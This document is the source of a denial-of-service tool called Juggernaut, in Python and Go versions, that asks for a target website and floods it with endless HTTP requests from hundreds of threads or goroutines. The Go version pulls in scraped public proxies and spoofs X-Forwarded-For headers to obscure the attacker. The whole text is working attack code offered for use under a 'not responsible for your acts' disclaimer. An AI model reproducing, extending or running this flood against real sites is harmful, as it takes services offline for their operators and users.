File: juggernaut.py
import sys
import signal
import requests
import threading
import random
import readline

BL = '\033[34m' # blue
P = '\033[35m' # purple
R = '\033[31m'  # red
G = '\033[32m'  # green
C = '\033[36m'  # cyan
W = '\033[0m'  # white
Y = '\033[33m'  # yellow
B = '\033[1m'  # bold
NB = '\033[0m'  # not bold
colors = [G, C, R, P, BL]

banner = f'''{random.choice(colors)}
     ██╗ ██╗   ██╗  ██████╗   ██████╗  ███████╗ ██████╗  ███╗   ██╗  █████╗  ██╗   ██╗ ████████╗
     ██║ ██║   ██║ ██╔════╝  ██╔════╝  ██╔════╝ ██╔══██╗ ████╗  ██║ ██╔══██╗ ██║   ██║ ╚══██╔══╝
     ██║ ██║   ██║ ██║  ███╗ ██║  ███╗ █████╗   ██████╔╝ ██╔██╗ ██║ ███████║ ██║   ██║    ██║   
██   ██║ ██║   ██║ ██║   ██║ ██║   ██║ ██╔══╝   ██╔══██╗ ██║╚██╗██║ ██╔══██║ ██║   ██║    ██║   
╚█████╔╝ ╚██████╔╝ ╚██████╔╝ ╚██████╔╝ ███████╗ ██║  ██║ ██║ ╚████║ ██║  ██║ ╚██████╔╝    ██║   
 ╚════╝   ╚═════╝   ╚═════╝   ╚═════╝  ╚══════╝ ╚═╝  ╚═╝ ╚═╝  ╚═══╝ ╚═╝  ╚═╝  ╚═════╝     ╚═╝   
{W}                                                                                                                            
'''
print(banner)

def kill_program(signum, frame):
    print("Exiting program, bye")
    while True:
        sys.exit(0)

signal.signal(signal.SIGINT, kill_program)

def load_agents():
    file = open("agents.txt")
    lines = file.readlines()
    for i in range(len(lines)):
        lines[i] = lines[i][:-2]

    return lines

print(
    f"{Y}Note: Keep on pressing CTRL + C or close the terminal when you want to stop attack{W}\n")
print(f"{R}{B}WARNING: I AM NOT RESPONSIBLE FOR YOUR ACTS{NB}{W}\n")
agents = load_agents()
print(f"{C}User-Agents Loaded!{W}")


def set_headers():
    return {
        "Host": host,
        "User-Agent": random.choice(agents),
        "Accept-Language": "en-us",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
        "Connection": "Keep-Alive",
        "Cache-Control": "no-cache",
        "Keep-Alive": str(random.randint(110, 120))
    }

def AttackWithoutProxy():
    while True:
        try:
            requests.get(site, headers=set_headers())
        except requests.exceptions.InvalidHeader:
            continue
        except KeyboardInterrupt:
            sys.exit(0)


print()
site = input("Enter url of the site you want to attack: ")

host = site
if "http://" in host:
    host = host.replace("http://", '')

elif "https://" in host:
    host = host.replace("https://", '')

if "www." in host:
    pass
else:
    host = "www." + host

try:
    print(f"{C}Checking authenticity of the url{W}")
    requests.get(site)

except KeyboardInterrupt:
    sys.exit(0)

except Exception as e:
    print(e)
    exit()
print(f"{G}The url is valid{W}")

threads = input("Enter the number of threads you want to use(default:500): ")

if threads == '':
    threads = 500

else:
    try:
        threads = int(threads)
    except ValueError:
        print(f"{R}A number was expected{W}")
        sys.exit(0)

    if int(threads) <= 0:
        print(f"{R}Number of threads cannot be < 1{W}")

print(f"\n{G}Starting attack, please wait{W}\n")
for i in range(threads):
    threading.Thread(target=AttackWithoutProxy, daemon=True).start()

print(f"{C}Attack Started, Behold destruction!{W}")

# main thread
while True:
    try:
        requests.get(site, headers=set_headers())
    except requests.exceptions.InvalidHeader:
        continue
    except KeyboardInterrupt:
        sys.exit(0)

File: juggernaut.go
package main

import (
	"bufio"
	"fmt"
	"io"
	"log"
	"math/rand"
	"net/http"
	"strings"

	// "net/http/httputil"
	"os"
	"strconv"
	"time"
)

var colorReset = string("\033[0m")
var colorRed = string("\033[31m")
var colorGreen = string("\033[32m")
var colorYellow = string("\033[33m")
var colorBlue = string("\033[34m")
var colorPurple = string("\033[35m")
var colorCyan = string("\033[36m")
var colorWhite = string("\033[37m")
var bold = string("\033[1m")
var notbold = string("\033[0m")

var agents []string = []string{}
var http_proxies []string = []string{}
var bannercolors []string = []string{colorRed, colorGreen, colorPurple, colorBlue, colorCyan}
var counter int = 0
var Url, host string

var banner = `
     ██╗ ██╗   ██╗  ██████╗   ██████╗  ███████╗ ██████╗  ███╗   ██╗  █████╗  ██╗   ██╗ ████████╗
     ██║ ██║   ██║ ██╔════╝  ██╔════╝  ██╔════╝ ██╔══██╗ ████╗  ██║ ██╔══██╗ ██║   ██║ ╚══██╔══╝
     ██║ ██║   ██║ ██║  ███╗ ██║  ███╗ █████╗   ██████╔╝ ██╔██╗ ██║ ███████║ ██║   ██║    ██║   
██   ██║ ██║   ██║ ██║   ██║ ██║   ██║ ██╔══╝   ██╔══██╗ ██║╚██╗██║ ██╔══██║ ██║   ██║    ██║   
╚█████╔╝ ╚██████╔╝ ╚██████╔╝ ╚██████╔╝ ███████╗ ██║  ██║ ██║ ╚████║ ██║  ██║ ╚██████╔╝    ██║   
 ╚════╝   ╚═════╝   ╚═════╝   ╚═════╝  ╚══════╝ ╚═╝  ╚═╝ ╚═╝  ╚═══╝ ╚═╝  ╚═╝  ╚═════╝     ╚═╝   

`

func load_agents() {
	file, err := os.Open("agents.txt")

	if err != nil {
		log.Fatal(err)
	}
	defer file.Close()

	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		str := scanner.Text()
		agents = append(agents, str)
	}
}

func load_proxies() {
	proxy_client := &http.Client{}
	req, _ := http.NewRequest("GET", "https://api.proxyscrape.com/v2/?request=getproxies&protocol=http&timeout=10000&country=all&ssl=all&anonymity=all", nil)
	resp, err := proxy_client.Do(req)

	if err != nil {
		fmt.Println(err)
	}

	bodybytes, err := io.ReadAll(resp.Body)

	if err != nil {
		fmt.Println(err)
	}
	body := string(bodybytes)

	sc := bufio.NewScanner(strings.NewReader(body))
	for sc.Scan() {
		http_proxies = append(http_proxies, sc.Text())
	}
}

func send_request_without_proxy() {

	for true {
		rand.Seed(time.Now().Unix())
		random_agent := rand.Int() % len(agents)
		client := &http.Client{}
		req, _ := http.NewRequest("GET", Url, nil)
		// if err != nil {fmt.Println("error occured here")}
		req.Host = host
		req.Header.Set("User-Agent", agents[random_agent])
		req.Header.Set("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8")
		req.Header.Set("Accept-Language", "en-us")
		req.Header.Set("Accept-Encoding", "gzip, deflate")
		req.Header.Set("Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7")
		req.Header.Set("Connection", "Keep-Alive")
		req.Header.Set("Cache-Control", "no-cache")
		req.Header.Set("Keep-Alive", strconv.Itoa(rand.Intn(120-110)+110))
		req.Header.Set("Upgrade-Insecure-Requests", "1")
		_, err := client.Do(req)

		if err != nil {
			fmt.Println(err)
			continue
		}

		counter++

		// reqDump, _ := httputil.DumpRequestOut(req, true)
		// fmt.Println(string(reqDump))
	}
}

func send_request_with_proxy() {

	for true {
		rand.Seed(time.Now().Unix())
		random_agent := rand.Int() % len(agents)
		random_proxy_index := rand.Int() % len(http_proxies)
		random_proxy := "http://" + http_proxies[random_proxy_index]
		x_forwarded_ip := strings.Split(http_proxies[random_proxy_index], ":")
		// proxyurl, _ := url.Parse(random_proxy)
		os.Setenv("HTTP_PROXY", random_proxy)
		// client := &http.Client{Transport: &http.Transport{Proxy: http.ProxyURL(proxyurl)}}
		client := &http.Client{}
		req, _ := http.NewRequest("GET", Url, nil)
		// if err != nil {fmt.Println("error occured here")}
		req.Host = host
		req.Header.Set("User-Agent", agents[random_agent])
		req.Header.Set("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8")
		req.Header.Set("Accept-Language", "en-us")
		req.Header.Set("Accept-Encoding", "gzip, deflate")
		req.Header.Set("Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7")
		req.Header.Set("Connection", "Keep-Alive")
		req.Header.Set("Cache-Control", "no-cache")
		req.Header.Set("Keep-Alive", strconv.Itoa(rand.Intn(120-110)+110))
		req.Header.Set("Upgrade-Insecure-Requests", "1")
		req.Header.Set("X-Forwarded-For", x_forwarded_ip[0])
		_, err := client.Do(req)

		if err != nil {
			continue
		}
		counter++

		// reqDump, _ := httputil.DumpRequestOut(req, true)
		// fmt.Println(string(reqDump))
	}
}

func main() {

	rand.Seed(time.Now().Unix())
	random_color := rand.Int() % len(bannercolors)
	var go_num int
	var use_proxies string

	fmt.Printf("%s%s%s", bannercolors[random_color], banner, colorReset)
	fmt.Printf("%sNote: The request counter may not work properly on some websites\n      Proxies do not work, YOUR ORIGINAL IP WILL BE USED. but enabling them will create some obfuscation%s\n\n", colorYellow, colorWhite)
	fmt.Printf("%s%sWARNING: I AM NOT RESPONSIBLE FOR YOUR ACTS%s%s\n\n", colorRed, bold, notbold, colorReset)

	load_agents()
	fmt.Printf("%sUser Agents loaded!%s\n\n", colorGreen, colorReset)
	load_proxies()
	fmt.Printf("%sProxies Scrapped!%s\n\n", colorGreen, colorReset)

	fmt.Print("Enter the url of website you want to attack: ")
	fmt.Scanln(&Url)

	host = Url
	if strings.Contains(host, "https") {

		if strings.Contains(host, "www.") {
			host = strings.ReplaceAll(host, "https://", "")
		} else {
			host = strings.ReplaceAll(host, "https://", "www.")
		}
	} else if strings.Contains(host, "http") {
		if strings.Contains(host, "www.") {
			host = strings.ReplaceAll(host, "http://", "")
		} else {
			host = strings.ReplaceAll(host, "http://", "www.")
		}
	} else {
		fmt.Printf("%sA url with https or http was required!%s", colorRed, colorReset)
		os.Exit(0)
	}

	fmt.Printf("\r%sValidating url...%s", colorBlue, colorReset)

	client := &http.Client{}
	req, _ := http.NewRequest("GET", Url, nil)
	_, err := client.Do(req)

	if err != nil {
		fmt.Printf("\r%sEither this url does not exist or the target refused to connect%s", colorRed, colorReset)
		os.Exit(0)
	} else {
		fmt.Printf("\r%sThe url is valid%s", colorGreen, colorWhite)
	}

	fmt.Print("\nEnter number of goroutines(default - 750): ")
	fmt.Scanln(&go_num)

	if go_num < 0 {
		fmt.Printf("%sgoroutines cannot be less than 1!%s", colorRed, colorReset)
		os.Exit(0)
	} else if go_num == 0 {
		go_num = 750
	}

	fmt.Print("Do you want to use proxies(n/Y): ")
	fmt.Scanln(&use_proxies)

	if use_proxies == "n" || use_proxies == "N" {
		for i := 0; i <= go_num; i++ {
			go send_request_without_proxy()
		}
		fmt.Printf("\n%sAttack Started without proxies, Behold Destruction!%s", colorCyan, colorWhite)
		fmt.Println("\n")
	} else {
		for i := 0; i <= go_num; i++ {
			go send_request_with_proxy()
		}
		fmt.Printf("\n%sAttack Started with proxies, Behold Destruction!%s", colorCyan, colorWhite)
		fmt.Println("\n")
	}

	for true {
		fmt.Printf("\r%s%d%s requests sent%s", colorBlue, counter, colorGreen, colorReset)
		time.Sleep(time.Second * 1)
	}
}
